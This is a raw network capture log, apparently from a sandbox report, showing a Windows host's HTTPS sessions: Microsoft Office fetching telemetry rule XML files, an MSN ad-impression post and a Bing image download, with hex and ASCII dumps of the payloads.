2024-12-08 12:31:19 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:19 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123119Z-r1cf579d7788pwqzhC1EWRrpd800000005pg000000001s25 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:19 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.6	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:23 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 27a1a40f-f01e-0096-7d0b-4810ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123123Z-r1cf579d778xq4f9hC1EWRx41g000000057g0000000025nt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:23 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.6	49737	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:21 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 9879796e-101e-0034-5802-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123121Z-r1cf579d778zvkpnhC1EWRv23g00000005p0000000002cms x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:22 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	49739	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:21 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 1e9ba10d-901e-0029-2907-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123121Z-r1cf579d778kr8xrhC1EWRfkun00000005xg0000000002hb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:22 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	49738	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:21 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123121Z-r1cf579d7786c2tshC1EWRr1gc00000005100000000025au x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:22 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	49740	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:21 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123121Z-r1cf579d7788pwqzhC1EWRrpd800000005h0000000005v2m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:22 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49741	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:21 UTC	265	OUT	POST /v3/Delivery/Events/Impression HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Content-Length: 1494 Content-Type: text/plain; charset=UTF-8 Host: arc.msn.com Connection: Keep-Alive Cache-Control: no-cache
2024-12-08 12:31:21 UTC	1494	OUT	Data Raw: 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 54 49 44 3d 31 26 43 49 44 3d 31 32 38 30 30 30 30 30 30 30 30 31 36 31 35 36 30 39 26 42 49 44 3d 33 31 31 31 37 36 37 35 32 26 50 47 3d 50 43 30 30 30 50 30 46 52 35 2e 30 30 30 30 30 30 30 49 52 55 26 54 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 52 45 51 41 53 49 44 3d 30 45 37 43 45 36 42 36 41 43 32 34 34 41 42 39 38 30 35 34 32 33 35 45 46 45 36 42 43 43 34 36 26 41 53 49 44 3d 33 34 65 37 37 63 32 32 37 33 35 38 34 65 30 37 62 37 64 37 62 34 34 37 62 35 31 34 32 65 61 30 26 54 49 4d 45 3d 32 30 32 34 31 32 30 38 54 31 32 33 31 30 39 5a 26 53 4c 4f 54 3d 31 26 52 45 51 54 3d 32 30 32 34 31 32 30 38 54 31 32 33 31 30 32 26 4d 41 5f 53 63 6f 72 65 3d 30 26 26 44 53 5f 45 56 54 49 44 3d 30 45 37 43 45 36 42 36 Data Ascii: PID=426081542&TID=1&CID=128000000001615609&BID=311176752&PG=PC000P0FR5.0000000IRU&TPID=426081542&REQASID=0E7CE6B6AC244AB98054235EFE6BCC46&ASID=34e77c2273584e07b7d7b447b5142ea0&TIME=20241208T123109Z&SLOT=1&REQT=20241208T123102&MA_Score=0&&DS_EVTID=0E7CE6B6
2024-12-08 12:31:22 UTC	394	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/xml; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:21 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49742	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:22 UTC	346	OUT	GET /th?id=OADD2.10239356819467_11XRGHD2R08E7TNPP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:22 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 885276 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: A9974F4E1D8B4C2D88305DBE519D234B Ref B: EWR311000104029 Ref C: 2024-12-08T12:31:22Z Date: Sun, 08 Dec 2024 12:31:21 GMT Connection: close
2024-12-08 12:31:22 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 16 cc 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 31 39 3a 32 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:19:238
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 96 28 af de 1f dd 2f fc b2 a8 fc c9 ad ee 2c 62 fb 4d bc d7 57 be 5c 97 76 9f f2 da de d5 5f fd 5d 5c d3 f4 98 7f d3 a2 d4 2e 7f d7 41 fe 89 e4 ff 00 e3 f4 fd 9d 30 b2 3d 0b e1 9f 8c a2 93 4f fb 2e bf 73 e4 d9 f9 f2 7f 67 ea 06 7d ff 00 64 45 ff 00 96 57 52 3f fe 3a f5 d8 e9 37 96 7a a6 8f 06 ab a5 6a 56 fa 9d 84 ff 00 ea 6e ed 2e 37 c3 5e 11 e3 2b fb 4b 8f 85 7e 2f d4 22 d3 6d e0 b5 b2 d2 e3 d3 3e d7 f7 3f d6 5c c2 9f f7 f6 b6 f4 6f 11 cb e1 9f 1d 5f 6a 16 b6 df e8 1e 7f 97 75 a4 da 7f aa 9d 7f f4 0a 9a 73 a9 0f 88 f2 b3 0c 8a 9d 7f 7e 8f bb 23 d9 68 ac af 07 78 a7 43 f1 3f 9c 34 ab 8f 26 ea cf fe 3e f4 9b bf dc dd d9 ff 00 c0 2b 56 ba 54 ae 7c 66 23 0d 53 0f 53 92 7b 92 45 fb ca 28 86 8a 60 14 51 45 06 61 45 14 50 01 e6 51 45 14 00 54 95 1d 49 e5 d2 66 Data Ascii: (/,bMW\v_]\.A0=O.sg}dEWR?:7zjVn.7^+K~/"m>?\o_jus~#hxC?4&>+VT\|f#SS{E(`QEaEPQETIf
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 7f ee 54 7a b4 fa 8c 9e 15 d5 25 b4 b6 f3 be c5 04 72 cb 69 0d c7 fa ff 00 29 f7 f9 49 57 35 09 2e fe d1 3c 51 5c f9 d1 7e ef ce ff 00 48 fd ce ff 00 ef d5 7d 29 e5 82 e2 19 2c 2e 2e 21 90 de c7 25 a0 8b fd 74 1b bf e5 a7 ff 00 15 fe cd 69 4e a0 14 f4 39 ed 35 4f 22 58 b5 2b 7f 2a 6f de cd 77 f6 8f f8 f4 8b ff 00 8a ab 9f be d3 ed fe c9 17 ee 62 9a fb ff 00 41 4f 93 7d 53 fb 24 a3 c4 33 ff 00 67 ff 00 c4 ce eb c4 d7 be 6d dc 5f c1 1d ef fb bf ed 25 49 e7 f9 77 1e 57 fa 9b af f5 5f b9 ad 2a 53 f6 86 7f 01 a9 0f fc b6 8a ee e6 de 1f 27 cb fb 27 f0 27 fb 75 1c d3 e9 d7 1a 2c f6 9f 69 f3 bc ef 2e 5f dc db ff 00 c7 bf ef bf f8 8a cf 86 0b 49 2e 3f 7b 73 fb d9 bf e5 b4 df ec ff 00 05 58 f2 e6 d4 34 e8 3f d1 ad e1 f3 a0 92 58 6d 3e d1 ff 00 3c bf bf be b4 f6 7e Data Ascii: Tz%ri)IW5.<Q\~H}),..!%tiN95O"X+owbAO}S$3gm_%IwW_S'''u,i._I.?{sX4?Xm><~
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 4a 68 34 fd 3c df df dc db d9 db 41 d6 ea ea e3 c9 8a bc 3f 58 f8 b5 e3 3b 8d 40 da ff 00 69 78 77 c3 36 bf bb 22 5d 3e c6 6d 4e ef e6 ff 00 96 69 e6 ec 87 cc ac 5d 56 cf 48 bb d4 26 bf f1 28 f1 17 88 35 0b 1f f4 9f b5 eb 96 ff 00 e8 76 7f dc df bd bc bf 33 fe b8 a6 da 5e d2 2c ec a7 93 4f ed 9e cd e2 1f 88 ff 00 0f 34 4d 37 fb 42 ff 00 c6 7a 34 d1 7f cb 28 b4 fb 8f b5 cc ff 00 ee 45 17 cd 5e 6f e2 cf 8f 77 b7 0d 3c 5e 06 f0 a5 c4 22 1f f5 ba b7 88 6d 9f 64 7f ee 5a c5 f3 ff 00 df 5b 6b 99 fb 7f da 2e 3e d7 ff 00 12 e8 65 87 f7 50 fd 93 48 86 da 69 3c cf fa 6c 9f c3 5b 10 da 5d c9 71 63 a7 cb 73 a8 c3 75 f6 1f 33 4e d3 a1 d8 90 f9 52 3f fc 07 ef 7f b7 51 cc 7a 54 f2 bc 3c 0b 1e 26 bb bb d6 2e 3f b3 f5 0f 12 5c 6b 57 50 c1 ff 00 13 1f f4 8f 26 de 3f 31 37 Data Ascii: Jh4<A?X;@ixw6"]>mNi]VH&(5v3^,O4M7Bz4(E^ow<^"mdZ[k.>ePHi<l[]qcsu3NR?QzT<&.?\kWP&?17
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: be cf 65 14 3f ea 6d 34 9b 7f 27 fe fb 77 f9 de b4 2d 34 5d 0f 54 fd ec 5f da 33 5d 59 7e ea 6f ed 1d 5f ed 3f ed d2 e7 03 a0 ba d6 bc 0f a7 eb 5f d9 5a de a5 e4 c5 7b 07 da 7f b2 75 1d 3f ed 9f bd 97 fd 5a 45 71 07 ef 9e b1 f4 fd 5b c3 b6 7a d5 8e 9f a5 78 6f ec 52 c3 3f 9b 36 a3 fd a1 73 6f 67 bf fe 9a 5b be e7 ff 00 80 56 1e 87 27 97 a7 7f 6a e9 5e 24 b8 87 f7 f2 5c cd fd 93 a7 a3 de 7d a2 2f dd ff 00 ad 7f bf 27 f7 63 fb 9f de ad 48 6e 34 8f ec d8 22 8a e7 c9 b5 87 cb 97 c9 86 e3 ce 9b ed 12 7f cf c4 9b 3f 79 70 d4 e9 d3 02 be b9 7f a7 5b db cf a7 e9 fa df 88 a1 96 f6 09 25 86 1f b0 7d a6 1d ed f7 ff 00 d3 3f d6 56 3d a4 f3 69 7e 1d 9e 5b bf dc da c3 f6 68 a1 b4 fb ff 00 67 f3 3f b9 b3 ff 00 1e ad cf ec c9 be cf 07 87 e2 b6 d1 ac be db 3f da 75 6b bb Data Ascii: e?m4'w-4]T_3]Y~o_?_Z{u?ZEq[zxoR?6sog[V'j^$\}/'cHn4"?yp[%}?V=i~[hg??uk
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: a6 95 69 6d f6 2b 49 bc cf b5 f9 37 0f fe 91 ff 00 5d f6 7d fa af fe 89 a7 e8 b6 36 97 77 3f ba 9a 7f fa f9 ff 00 47 8f fd 8a d2 99 99 c9 cd 3e a3 aa 6a 3e 6d dd cf fc 79 41 1f 9d 2c df e8 d0 da 5b a7 f0 6f ff 00 e2 3e 6a ec 34 fb bf ed 8b 69 e5 97 4d b7 d5 2d 75 49 ff 00 d1 2d 2d 35 0f 26 ce e2 28 ff 00 74 9b 3f e7 8f fe cd 56 2c f5 2b 49 3e c3 17 f6 27 88 b5 4d 3f f7 9f e8 9a e7 fa 4a 7e ef ff 00 21 a6 ef fc 76 a9 eb 9e 25 b4 8e e2 7f 10 5d dc dc 43 a7 f9 ff 00 f2 c6 e2 1f f5 bf f5 cb f8 3f d8 a3 d9 87 c0 67 eb 9a b5 9d 9e a3 7d fd 95 f6 7d 2e eb cf 8e 5f b5 ff 00 67 a7 db 20 8a 3f 93 6b ff 00 cf b7 99 ff 00 8f 55 8b 4b 0d 3a e2 e2 7b bf 0f fd a3 45 b5 9b cb 8b ca 86 de 1f b1 dd ff 00 db 1f ef ee fe 3a b1 69 ae e9 1a 5e 8b 3e ab 2f 8d b4 e8 62 9a 7f 33 Data Ascii: im+I7]}6w?G>j>myA,[o>j4iM-uI--5&(t?V,+I>'M?J~!v%]C?g}}._g ?kUK:{E:i^>/b3
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 9a ed 9e a1 a8 d8 dd c5 e2 4b 8b 2f 3b f7 ba 75 df f6 07 d8 e6 b8 97 fd b9 a1 fd df fc 0e ae 6a da 16 a3 1e b5 04 ba af ef b5 0d 4e 79 22 fd ce a1 f6 8b 8f b4 7f 1b bf fb 1f ed d1 fb c8 19 99 f3 4f 77 1f d8 7f b5 7f 73 6b 07 fc 84 61 fd cf fa 44 bf f0 3f de 55 c9 af f5 69 34 ef ec a8 b4 dd 46 f6 29 bf e5 8d a7 93 32 5f f9 5f ea f7 ec df fb b8 e8 9a 39 b4 3f 15 4f a5 5d f8 93 c3 ba 5c 53 5f 79 53 7f 68 ec bc bc b8 8a 3f f9 ed b3 e7 ae 82 6d 36 6b 3d 17 fe 29 ab 9b 7b 2d 3e 6f fa 07 69 09 67 f6 8f fb 68 9f fd 8d 6b 53 fb e0 71 fe 20 b0 bb d5 3c 45 a5 ea 16 9a 6d be 8b 14 36 5f 61 9b ca b0 4f 3b cd 8b e7 fd dd be e5 f3 bf eb ad 49 e1 3d 4a 1b 7f 3f 50 d5 7e cf aa 7d b6 09 2d bc 9f f5 3f 68 b8 fe ff 00 fb 9f ec 55 8d 5b fb 5f 4f b7 be d4 35 5d 37 5a ff 00 89 Data Ascii: K/;ujNy"OwskaD?Ui4F)2__9?O]\S_ySh?m6k=){->oighkSq <Em6_aO;I=J?P~}-?hU[_O5]7Z
